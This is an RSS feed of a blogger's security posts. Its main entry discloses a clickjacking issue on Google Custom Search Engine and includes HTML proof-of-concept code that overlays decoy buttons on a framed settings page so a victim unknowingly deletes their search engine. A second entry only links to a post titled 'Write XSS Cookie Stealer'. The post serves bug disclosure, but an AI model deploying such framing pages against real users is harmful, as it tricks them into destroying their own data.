DEV Community: Abay The latest articles on DEV Community by Abay (@kustirama). https://dev.to/kustirama https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F115144%2F2f379a00-036e-46d6-a29d-22cb03726d42.jpeg DEV Community: Abay https://dev.to/kustirama en Clickjacking on Google CSE. Is this Important? Abay Sat, 09 Feb 2019 21:06:01 +0000 https://dev.to/kustirama/clickjacking-on-google-cse-is-this-important-3bdk https://dev.to/kustirama/clickjacking-on-google-cse-is-this-important-3bdk <p>While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone's CSE.</p> <p><iframe class="tweet-embed" id="tweet-1094333150086320130-119" src="https://platform.twitter.com/embed/Tweet.html?id=1094333150086320130"> </iframe> // Detect dark theme var iframe = document.getElementById('tweet-1094333150086320130-119'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=1094333150086320130&amp;theme=dark" } </p> <p>Summary: Attacker can delete victim's CSE.</p> <p>Steps to reproduce:</p> <ol> <li>Go to <a href="https://cse.google.com/" rel="noopener noreferrer">https://cse.google.com/</a> </li> <li>It can be embedded into any webpage.</li> <li>Attacker may manipulate HTML template so it can delete victim's CSE.</li> </ol> <p>I wrote an exploit code for clickjacking and here is the exploit code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;center&gt;</span> <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"position: absolute; left: 100px; top: 10px;"</span><span class="nt">&gt;&lt;h3&gt;</span>Let's consider this is a game!<span class="nt">&lt;/h3&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"position: absolute; left: 100px; top: 40px;"</span><span class="nt">&gt;&lt;h3&gt;</span>To finish it, you have to press the keys in sequence.<span class="nt">&lt;/h3&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"position: absolute; left: 205px; top: 278px; color: red;"</span><span class="nt">&gt;&lt;button&gt;</span>1<span class="nt">&lt;/button&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"position: absolute; left: 300px; top: 178px; color: red;"</span><span class="nt">&gt;&lt;button&gt;</span>2<span class="nt">&lt;/button&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"position: absolute; left: 400px; top: 475px; color: red;"</span><span class="nt">&gt;&lt;button&gt;</span>3<span class="nt">&lt;/button&gt;&lt;/div&gt;</span> <span class="nt">&lt;iframe</span> <span class="na">style=</span><span class="s">"opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;"</span> <span class="na">src=</span><span class="s">"https://cse.google.com/"</span> <span class="na">width=</span><span class="s">"100%"</span> <span class="na">height=</span><span class="s">"100%"</span><span class="nt">&gt;&lt;/iframe&gt;</span> </code></pre> </div> <p>By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.</p> <p>About how attacker can make someone unconsciously delete their CSE, you can check my video PoC here:<br> <iframe width="710" height="399" src="https://www.youtube.com/embed/Fkzm8ZUFZ0E"> </iframe> <br> Enough about the explanation.</p> <p>Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone's data (CSE), isn't this a bug? But the response I got was very surprising.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnatzkdm55w8ja3opjc3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnatzkdm55w8ja3opjc3.png" alt="Google's response about my report" width="161" height="81"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ncsy0zigpwp8k24p72x.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ncsy0zigpwp8k24p72x.png" alt="Google's response about my report" width="161" height="81"></a></p> <p>The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people's data.</p> <p>What do you think? Is this a bug? Or is it just me who overestimates this as a bug?</p> security testing Write XSS Cookie Stealer Abay Tue, 27 Nov 2018 22:13:11 +0000 https://dev.to/kustirama/write-xss-cookie-stealer-5ed1 https://dev.to/kustirama/write-xss-cookie-stealer-5ed1 <p>English version soon (maybe)<br> <a href="http://ox.metrotvnews.com/newrevive/www/delivery/ck.php?oadest=https://abaykan.com/post/membuat-xss-cookie-stealer" rel="noopener noreferrer">Write XSS Cookie Stealer</a></p> security javascript php